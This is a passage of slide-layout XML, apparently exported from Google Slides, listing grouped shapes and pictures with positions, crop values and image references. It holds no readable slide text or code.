          <p:cNvPr id="1886" name="Google Shape;1886;p13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1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88" name="Google Shape;1888;p1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889" name="Google Shape;1889;p135"/>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890" name="Google Shape;1890;p13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891" name="Google Shape;1891;p135"/>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892" name="Google Shape;1892;p1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93" name="Google Shape;1893;p13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94" name="Google Shape;1894;p13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3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13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13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98" name="Google Shape;1898;p13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99" name="Google Shape;1899;p13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00" name="Google Shape;1900;p13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13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902" name="Google Shape;1902;p13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3" name="Google Shape;1903;p135"/>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4" name="Google Shape;1904;p13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5" name="Google Shape;1905;p135"/>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06" name="Google Shape;1906;p13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907"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1908" name="Google Shape;1908;p13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1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10" name="Google Shape;1910;p1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11" name="Google Shape;1911;p136"/>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912" name="Google Shape;1912;p13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13" name="Google Shape;1913;p136"/>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914" name="Google Shape;1914;p1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15" name="Google Shape;1915;p13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16" name="Google Shape;1916;p13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13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13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13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20" name="Google Shape;1920;p13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21" name="Google Shape;1921;p13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22" name="Google Shape;1922;p13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13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924" name="Google Shape;1924;p136"/>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5" name="Google Shape;1925;p136"/>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26" name="Google Shape;1926;p136"/>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27" name="Google Shape;1927;p136"/>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28" name="Google Shape;1928;p136"/>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14"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="115" name="Google Shape;115;p39"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="118" b="119"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="18792305" y="2427400"/>
            <a:ext cx="4875530" cy="10092796"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="116" name="Google Shape;116;p39"/>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17" name="Google Shape;117;p39"/>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18" name="Google Shape;118;p39"/>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marR="0" lvl="0"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19" name="Google Shape;119;p39"/>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20" name="Google Shape;120;p3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21" name="Google Shape;121;p39"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="122" name="Google Shape;122;p39"/>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23" name="Google Shape;123;p3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929"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1930" name="Google Shape;1930;p1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1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32" name="Google Shape;1932;p1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33" name="Google Shape;1933;p137"/>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934" name="Google Shape;1934;p13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35" name="Google Shape;1935;p137"/>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936" name="Google Shape;1936;p1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37" name="Google Shape;1937;p1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38" name="Google Shape;1938;p1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1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1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42" name="Google Shape;1942;p1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43" name="Google Shape;1943;p1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44" name="Google Shape;1944;p1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1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946" name="Google Shape;1946;p137"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="475" b="464"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="3504095"/>
            <a:ext cx="2094299" cy="1617978"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1947" name="Google Shape;1947;p137"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="475" b="464"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="5360928"/>
            <a:ext cx="2094298" cy="1617978"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1948" name="Google Shape;1948;p137"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="475" b="464"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="7203328"/>
            <a:ext cx="2094298" cy="1617978"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1949" name="Google Shape;1949;p137"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="475" b="464"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="9047395"/>
            <a:ext cx="2094298" cy="1617978"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1950" name="Google Shape;1950;p137"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="475" b="464"/>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951"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1952" name="Google Shape;1952;p13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1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54" name="Google Shape;1954;p1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55" name="Google Shape;1955;p138"/>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956" name="Google Shape;1956;p13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57" name="Google Shape;1957;p138"/>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958" name="Google Shape;1958;p1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59" name="Google Shape;1959;p13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60" name="Google Shape;1960;p13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13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13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13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13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13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66" name="Google Shape;1966;p13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67" name="Google Shape;1967;p13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68" name="Google Shape;1968;p13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69" name="Google Shape;1969;p13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970" name="Google Shape;1970;p138"/>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71" name="Google Shape;1971;p138"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="227" b="237"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="4930259"/>
            <a:ext cx="1540411" cy="1190090"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1972" name="Google Shape;1972;p138"/>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3" name="Google Shape;1973;p138"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="227" b="237"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="8109292"/>
            <a:ext cx="1540411" cy="1190090"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1974" name="Google Shape;1974;p138"/>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5" name="Google Shape;1975;p138"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="227" b="237"/>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976"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1977" name="Google Shape;1977;p13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1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79" name="Google Shape;1979;p1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80" name="Google Shape;1980;p139"/>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981" name="Google Shape;1981;p13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82" name="Google Shape;1982;p139"/>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983" name="Google Shape;1983;p1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84" name="Google Shape;1984;p13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85" name="Google Shape;1985;p13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13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13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13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13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13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91" name="Google Shape;1991;p13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92" name="Google Shape;1992;p13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93" name="Google Shape;1993;p13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94" name="Google Shape;1994;p13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995" name="Google Shape;1995;p13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96" name="Google Shape;1996;p139"/>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1997" name="Google Shape;1997;p13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98" name="Google Shape;1998;p139"/>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1999" name="Google Shape;1999;p13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00" name="Google Shape;2000;p139"/>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001"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2002" name="Google Shape;2002;p14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1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04" name="Google Shape;2004;p1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005" name="Google Shape;2005;p140"/>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006" name="Google Shape;2006;p14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07" name="Google Shape;2007;p140"/>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008" name="Google Shape;2008;p1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09" name="Google Shape;2009;p14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10" name="Google Shape;2010;p14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4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4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4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4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14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16" name="Google Shape;2016;p14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17" name="Google Shape;2017;p14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18" name="Google Shape;2018;p14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19" name="Google Shape;2019;p14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020" name="Google Shape;2020;p140"/>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21" name="Google Shape;2021;p140"/>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22" name="Google Shape;2022;p140"/>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3" name="Google Shape;2023;p140"/>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4" name="Google Shape;2024;p140"/>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5" name="Google Shape;2025;p140"/>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026"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2027" name="Google Shape;2027;p1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1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29" name="Google Shape;2029;p1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030" name="Google Shape;2030;p141"/>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031" name="Google Shape;2031;p14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32" name="Google Shape;2032;p141"/>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033" name="Google Shape;2033;p1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34" name="Google Shape;2034;p1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35" name="Google Shape;2035;p1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1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1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1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1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1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41" name="Google Shape;2041;p1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42" name="Google Shape;2042;p1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43" name="Google Shape;2043;p1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44" name="Google Shape;2044;p1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045" name="Google Shape;2045;p141"/>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46" name="Google Shape;2046;p141"/>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47" name="Google Shape;2047;p141"/>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48" name="Google Shape;2048;p141"/>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49" name="Google Shape;2049;p141"/>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50" name="Google Shape;2050;p141"/>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051"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2052" name="Google Shape;2052;p14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1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54" name="Google Shape;2054;p1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055" name="Google Shape;2055;p142"/>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056" name="Google Shape;2056;p14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57" name="Google Shape;2057;p142"/>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058" name="Google Shape;2058;p1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59" name="Google Shape;2059;p14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60" name="Google Shape;2060;p14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14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62" name="Google Shape;2062;p14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14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64" name="Google Shape;2064;p14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14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66" name="Google Shape;2066;p14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14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68" name="Google Shape;2068;p14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14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70" name="Google Shape;2070;p14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14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072" name="Google Shape;2072;p142"/>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3" name="Google Shape;2073;p142"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1047" b="1036"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="4559067"/>
            <a:ext cx="1389526" cy="1056315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2074" name="Google Shape;2074;p142"/>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5" name="Google Shape;2075;p142"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1047" b="1036"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="7347100"/>
            <a:ext cx="1389526" cy="1056315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2076" name="Google Shape;2076;p142"/>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77" name="Google Shape;2077;p142"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1380" b="1389"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="10119360"/>
            <a:ext cx="1388917" cy="1048513"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2078" name="Google Shape;2078;p142"/>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079"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2080" name="Google Shape;2080;p14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1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82" name="Google Shape;2082;p1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083" name="Google Shape;2083;p143"/>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084" name="Google Shape;2084;p14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85" name="Google Shape;2085;p143"/>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086" name="Google Shape;2086;p1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87" name="Google Shape;2087;p14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88" name="Google Shape;2088;p14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14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90" name="Google Shape;2090;p14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14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92" name="Google Shape;2092;p14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14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94" name="Google Shape;2094;p14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14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96" name="Google Shape;2096;p14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14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98" name="Google Shape;2098;p14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14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100" name="Google Shape;2100;p14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01" name="Google Shape;2101;p143"/>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02" name="Google Shape;2102;p14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3" name="Google Shape;2103;p143"/>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4" name="Google Shape;2104;p14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5" name="Google Shape;2105;p143"/>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06" name="Google Shape;2106;p14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107"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2108" name="Google Shape;2108;p14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1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10" name="Google Shape;2110;p1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111" name="Google Shape;2111;p144"/>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112" name="Google Shape;2112;p14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13" name="Google Shape;2113;p144"/>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114" name="Google Shape;2114;p1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15" name="Google Shape;2115;p14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16" name="Google Shape;2116;p14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14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18" name="Google Shape;2118;p14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14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20" name="Google Shape;2120;p14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14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22" name="Google Shape;2122;p14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14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24" name="Google Shape;2124;p14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14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26" name="Google Shape;2126;p14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14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128" name="Google Shape;2128;p144"/>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29" name="Google Shape;2129;p144"/>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30" name="Google Shape;2130;p144"/>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31" name="Google Shape;2131;p144"/>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32" name="Google Shape;2132;p144"/>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3" name="Google Shape;2133;p144"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="2883" b="2891"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="10119360"/>
            <a:ext cx="1388917" cy="1048512"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2134" name="Google Shape;2134;p144"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="2883" b="2891"/>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135"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2136" name="Google Shape;2136;p1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1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38" name="Google Shape;2138;p1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139" name="Google Shape;2139;p145"/>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140" name="Google Shape;2140;p14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41" name="Google Shape;2141;p145"/>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142" name="Google Shape;2142;p1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43" name="Google Shape;2143;p1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44" name="Google Shape;2144;p1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1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46" name="Google Shape;2146;p1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1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48" name="Google Shape;2148;p1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1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50" name="Google Shape;2150;p1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1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52" name="Google Shape;2152;p1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1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54" name="Google Shape;2154;p1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1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156" name="Google Shape;2156;p145"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1275"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="3124233"/>
            <a:ext cx="1389526" cy="1056315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2157" name="Google Shape;2157;p145"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1275"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="4559067"/>
            <a:ext cx="1389526" cy="1056316"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2158" name="Google Shape;2158;p145"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1275"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="5881600"/>
            <a:ext cx="1389526" cy="1056315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2159" name="Google Shape;2159;p145"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1275"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="7347100"/>
            <a:ext cx="1389526" cy="1056316"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2160" name="Google Shape;2160;p145"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1276" b="1275"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="8740767"/>
            <a:ext cx="1389526" cy="1056315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2161" name="Google Shape;2161;p145"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1616" b="1615"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="10119360"/>
            <a:ext cx="1388917" cy="1048512"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2162" name="Google Shape;2162;p145"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1616" b="1615"/>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163"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2164" name="Google Shape;2164;p1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65" name="Google Shape;2165;p1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166" name="Google Shape;2166;p146"/>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167" name="Google Shape;2167;p14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68" name="Google Shape;2168;p146"/>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169" name="Google Shape;2169;p1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70" name="Google Shape;2170;p14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14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72" name="Google Shape;2172;p14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14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74" name="Google Shape;2174;p14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14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76" name="Google Shape;2176;p14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14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78" name="Google Shape;2178;p14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14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80" name="Google Shape;2180;p14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14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82" name="Google Shape;2182;p14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14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84" name="Google Shape;2184;p14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14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186" name="Google Shape;2186;p146"/>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87" name="Google Shape;2187;p146"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1047" b="1036"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="4559808"/>
            <a:ext cx="1267637" cy="963655"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2188" name="Google Shape;2188;p146"/>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89" name="Google Shape;2189;p146"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1047" b="1036"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="6872808"/>
            <a:ext cx="1267637" cy="963655"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2190" name="Google Shape;2190;p146"/>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91" name="Google Shape;2191;p146"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1047" b="1036"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145750" y="9168384"/>
            <a:ext cx="1267637" cy="963655"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2192" name="Google Shape;2192;p146"/>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3" name="Google Shape;2193;p146"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="1047" b="1036"/>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24"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="125" name="Google Shape;125;p40"/>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26" name="Google Shape;126;p40"/>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marR="0" lvl="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="9600"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="9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27" name="Google Shape;127;p40"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="138" r="148"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3354260" y="3554200"/>
            <a:ext cx="3656648" cy="5338703"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="128" name="Google Shape;128;p4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4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194"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
